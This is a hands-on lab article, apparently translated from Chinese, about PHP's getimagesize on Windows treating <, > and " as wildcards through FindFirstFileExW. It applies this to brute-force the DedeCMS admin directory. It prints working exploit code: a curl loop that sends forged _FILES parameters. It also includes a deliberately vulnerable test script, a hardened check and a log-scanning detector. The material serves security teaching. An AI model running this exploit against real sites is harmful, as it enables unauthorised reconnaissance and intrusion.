PHP is a popular open-source scripting language implemented in C. It supports almost all mainstream databases and operating systems, is far more efficient than CGI (where the program has to generate all of the HTML markup itself), and is mainly used for web development. Most importantly, PHP can be extended with C and C++ code!
All file-operation functions are sensitive functions. When they are used improperly or referenced unsafely, they break the business logic and open up many security risks, such as arbitrary file download, arbitrary file write and arbitrary file deletion vulnerabilities.
Below, the problems that the file-judging function getimagesize can cause are explained concretely, using the DedeCMS admin directory as the example, to show the harm done when PHP references such a function in an unsafe way.
Hopefully this walkthrough will help you understand how the vulnerability arises and the risk posed by similar file-judging functions; reproducing it yourself in the lab environment gives a much better feel for it, so follow along! >>>>> File function experiment portal
1. Goals of the hands-on experiment:
- Learn about common PHP functions
- Understand the risk of PHP file-judging functions
- Understand the business-logic vulnerabilities that file operations can introduce
2. Required tools:
Hackbar: a Firefox plugin that helps you test for SQL injection, XSS vulnerabilities and general site security. It is mainly meant to help developers audit their own code, and it can quickly encode strings in various ways.
3. Practical content:
This section introduces some PHP functions that, when PHP runs on Windows, end up invoking the underlying Windows API function FindFirstFileExW(). It explains the vulnerabilities that arise when some of these functions are used unsafely, and uses a DedeCMS instance to locate its admin directory on Windows by means of this behaviour, so that we gain a deeper understanding of the potential harm of these functions.
Some PHP functions show the following curious behaviour on Windows systems:
- the greater-than sign (>) is equivalent to the wildcard question mark (?)
- the less-than sign (<) is equivalent to the wildcard asterisk (*)
- the double quotation mark (") is equivalent to the dot character (.)
This behaviour was discovered by foreign security researchers some time ago.
It is present in PHP's getimagesize method. In the PHP source, php-src\ext\standard\image.c contains the definition of this method:
```c
...
/* {{{ proto array getimagesize(string imagefile [, array info])
   Get the size of an image as 4-element array */
PHP_FUNCTION(getimagesize)
{
	php_getimagesize_from_any(INTERNAL_FUNCTION_PARAM_PASSTHRU, FROM_PATH);
}
/* }}} */
...
```
getimagesize calls the php_getimagesize_from_any method. Using dynamic debugging to simplify the analysis and tracing the call layer by layer, the invocation order of getimagesize turns out to be:
PHP_FUNCTION(getimagesize) -> php_getimagesize_from_any -> ... -> tsrm_realpath_r -> FindFirstFileExW
The dynamic debugging is not the focus of this experiment; for the detailed procedure refer to the following link: https://xianzhi.aliyun.com/forum/topic/2004
In the end, PHP's getimagesize calls the Windows API FindFirstFileExW().
Because PHP does not filter or prohibit the special characters <, > and " at the language level, any file-judging function that calls this Windows API method, not only getimagesize, may have the same problem.
4. Experimental content:
In this experiment we use getimagesize, a specific PHP function that calls the underlying winapi, to explain the problems that exist when a PHP function invokes a winapi method. DedeCMS is also referred to as a higher-level instance, to show the security risk that exists when getimagesize, which relies on this underlying winapi method, is referenced unsafely.
Step 1: verify the getimagesize() function locally
Use the search tool Everything in our lab to find the phpStudy installation. Installing the PHP environment
After the installation is complete, create a new test.php in C:\phpStudy\www to validate the getimagesize function; the phpStudy installation path varies, so adjust it to your actual situation.
Next, create a new directory asdasdasd under C:\phpStudy\www. The code of test.php is as follows:
```php
<?php
$a = $_GET['img'];
exec('pause');            // pause, kept from the original test script
if (@getimagesize($a)) {  // path comes straight from the request
    echo "OK";
}
?>
```
When everything is ready, visit test.php at the following address:
http://127.0.0.1/test.php?img=C:\phpStudy\www\a<\1.png
The page returns OK. The real directory name in the path should be asdasdasd; we replaced it with a<, and getimagesize still loaded the image file successfully thanks to this behaviour.
Step 2: guessing the dedecms admin directory
In the following example we use the script provided in this section to obtain the dedecms admin directory.
The vulnerability lies in the getimagesize function: as mentioned above, PHP's getimagesize ends up calling the Windows API FindFirstFileExW(), where on Windows the three characters <, > and " are given different meanings. That is why the dedecms admin directory can be brute-forced.
Let us look at the trigger condition of the vulnerability. The core code in dedecms's uploadsafe.inc.php is as follows:
```php
...
if (in_array(strtolower(trim(${$_key.'_type'})), $imtypes)) {
    $image_dd = @getimagesize($$_key);
    if (!is_array($image_dd)) {
        exit('Upload filetype not allow!');
    }
}
...
```
Here uploadsafe.inc.php calls the getimagesize method directly to obtain the file's size. If nothing is returned, the file is either not an image or does not exist, and the script exits without saving the upload. Using this logic, one can tell whether a directory contains a file in image format, which is the basis for guessing the directory.
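To make the unsafe pattern concrete, here is an added example (not DedeCMS code) that places the check shape used by uploadsafe.inc.php next to a hardened version which rejects the three Windows wildcard characters described above and only inspects genuine uploads; $imtypes and the function names are assumptions for the illustration.

```php
<?php
// Added example, not DedeCMS code. $imtypes and the function names are assumptions.
$imtypes = ['image/gif', 'image/jpeg', 'image/png'];

// Same shape as uploadsafe.inc.php: $$_key and ${$_key.'_type'} come from
// request-registered variables, so the path handed to getimagesize() is
// attacker-controlled, and on Windows the characters < > " inside it reach
// FindFirstFileExW() with wildcard / dot meaning. The true/false result is
// the oracle the exp relies on.
function check_upload_unsafe(string $tmp_name, string $type, array $imtypes): bool
{
    if (in_array(strtolower(trim($type)), $imtypes, true)) {
        $image_dd = @getimagesize($tmp_name);
        if (!is_array($image_dd)) {
            return false; // exit('Upload filetype not allow!') in the original
        }
    }
    return true;
}

// Hardened shape: read only the real $_FILES superglobal, reject the
// wildcard / meta characters before anything touches the filesystem, and
// accept only PHP's own upload temp file.
function check_upload_safe(string $key, array $imtypes): bool
{
    if (!isset($_FILES[$key]) || $_FILES[$key]['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $tmp_name = (string) $_FILES[$key]['tmp_name'];
    // < > " become * ? . on Windows; NUL truncates the path.
    if (preg_match('/[<>"*?\x00]/', $tmp_name)) {
        return false;
    }
    if (!is_uploaded_file($tmp_name)) {
        return false;
    }
    // Decide the type from the file content, not from the client-supplied type.
    $info = @getimagesize($tmp_name);
    return is_array($info) && in_array($info['mime'], $imtypes, true);
}
```

With the hardened check a forged tmp_name never reaches getimagesize(), so the exists/does-not-exist oracle that step 2 depends on disappears.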
In dedecms, tags.php loads common.inc.php, and common.inc.php loads uploadsafe.inc.php at around line 148:
```php
if ($_FILES) { require_once(DEDEINC.'/uploadsafe.inc.php'); }
```
So the file reference chain is: tags.php -> common.inc.php -> uploadsafe.inc.php -> getimagesize()
EXP analysis and use
In the lab environment we provide access to the exp from our library of tools collected from the Internet:
http://tools.ichunqiu.com/y688t6z4
download
Let's look at the main code sections of the exp:
```php
...
if ($path) {
    // continue from a known prefix
    while (($path = my_func($url, $path))) {
        echo strtolower($path) . "\n";
    }
} else {
    // no prefix given: try every allowed first character
    for ($i = 48; $i <= 90; $i++) {
        if ((48 <= $i && $i <= 57) or (65 <= $i && $i <= 90)) {
            $path = my_func($url, chr($i));
            while ($path) {
                echo strtolower($path) . "\n";
                $path = my_func($url, $path);
            }
        }
    }
}
...
```
The condition if((48 <= $i && $i <= 57) or (65 <= $i && $i <= 90)) can be understood with the ASCII table: it enumerates all the characters that may appear in a directory name, 0-9 and a-z, and feeds them one position at a time into the exhaustive match.
The following code is the core part of the entire exp:
```php
...
function my_func($url, $path = '')
{
    $ch = curl_init($url);
    $i = 48;
    global $version;
    while ($i <= 90) {
        if ((48 <= $i && $i <= 57) or (65 <= $i && $i <= 90)) {
            if ($version != '5.7') {
                /* v5.6 and below */
                $admin_path = './' . $path . chr($i) . '</img/admin_top_logo.gif';
            } else {
                /* v5.7 */
                $admin_path = './' . $path . chr($i) . '</images/admin_top_logo.gif';
            }
            $data = 'dopost=save&_FILES[b4dboy][tmp_name]=' . $admin_path
                  . '&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif';
            $options = array(
                CURLOPT_USERAGENT      => 'Firefox/58.0',
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST           => true,
                CURLOPT_POSTFIELDS     => $data,
            );
            curl_setopt_array($ch, $options);
            $response = curl_exec($ch);
            /* the pattern was lost in the original listing; a miss answers 'Upload filetype not allow!' */
            if (!preg_match('/Upload filetype not allow/', $response)) {
                return $path . chr($i);
            }
        }
        $i++;
    }
}
...
```
This exp takes advantage of a small flaw in the dedecms design: when the directory contains the image file, the program returns normally, and when it does not, the program throws an exception with the prompt Upload filetype not allow!
In dedecms the frontend can call getimagesize() directly, so we picked a known image in the dedecms admin directory, admin_top_logo.gif, to guess with. See the following code for details:
'</img/admin_top_logo.gif';
This lets us use the wildcard < to match the admin directory name one character at a time, which is the central idea of the exp.
Here's how:
Download exp.php and put it into the PHP installation directory; here we put it under c:\phpStudy\php53. This path depends on the phpStudy installation path and the chosen PHP version, so adjust it to your actual situation.
The admin directory is guessed successfully.
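As an added example (not part of the original page or the exp), the following PHP script flags requests whose URL carries the Windows wildcard characters or a forged _FILES[...] parameter; the log lines are constructed samples in Apache combined format and the function names are my own.

```php
<?php
// Added example, not from the original page. Constructed access-log samples:
// line 1 mirrors the step 1 probe, line 2 the exp's forged _FILES parameter,
// line 3 is an ordinary image request that must not be flagged.
$sample_log = <<<'LOG'
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /test.php?img=C:\phpStudy\www\a%3C\1.png HTTP/1.1" 200 2 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /tags.php?dopost=save&_FILES%5Bb4dboy%5D%5Btmp_name%5D=./d%3C/images/admin_top_logo.gif HTTP/1.1" 200 0 "-" "Firefox/58.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /uploads/1.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
LOG;

// Returns the reasons a request URI looks like a wildcard / variable-registration probe.
function is_suspicious_request(string $request_uri): array
{
    $reasons = [];
    $decoded = rawurldecode($request_uri);
    // The three characters FindFirstFileExW() treats specially (* ? . semantics).
    if (preg_match('/[<>"]/', $decoded)) {
        $reasons[] = 'windows-wildcard-char';
    }
    // A client has no business naming a superglobal in a request parameter.
    if (preg_match('/(^|[?&])_FILES\[/i', $decoded)) {
        $reasons[] = 'forged-_FILES-param';
    }
    return $reasons;
}

// Parses combined-format lines and keeps those with at least one reason.
function scan_access_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) .*? "(?:GET|POST|HEAD) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $reasons = is_suspicious_request($m[2]);
        if ($reasons) {
            $hits[] = ['ip' => $m[1], 'uri' => $m[2], 'reasons' => $reasons];
        }
    }
    return $hits;
}

foreach (scan_access_log($sample_log) as $hit) {
    printf("%s %s -> %s\n", $hit['ip'], $hit['uri'], implode(',', $hit['reasons']));
}
```

The exp in this article sends the forged parameters in a POST body, which the access log does not record, so the same check needs to run where the request body is visible (a WAF or application-level request logging).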
Analysis and summary of the experimental results:
- The root cause of the problem is that PHP calls the Windows API method FindFirstFileExW() / FindFirstFile()
- This Windows API method treats the three characters <, > and " specially
- Interested students can follow the ideas of this experiment to look for other ways to use this behaviour and other vulnerabilities.
Some thoughts:
- Which other PHP functions that invoke the Windows API show such surprising features?
- Does this feature appear in other languages that call this Windows API?
References:
- Http://wps2015.org/drops/drops/PHP%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E6%80%9D%E8%B7%AF+%E5%AE%9E%E4%BE%8B.html
- Http://www.cnblogs.com/yxhblogs/p/5839800.html
- https://xianzhi.aliyun.com/forum/topic/2064
- https://xianzhi.aliyun.com/forum/topic/2004
Website Vulnerability: the security risk of file-judging functions (hands-on article)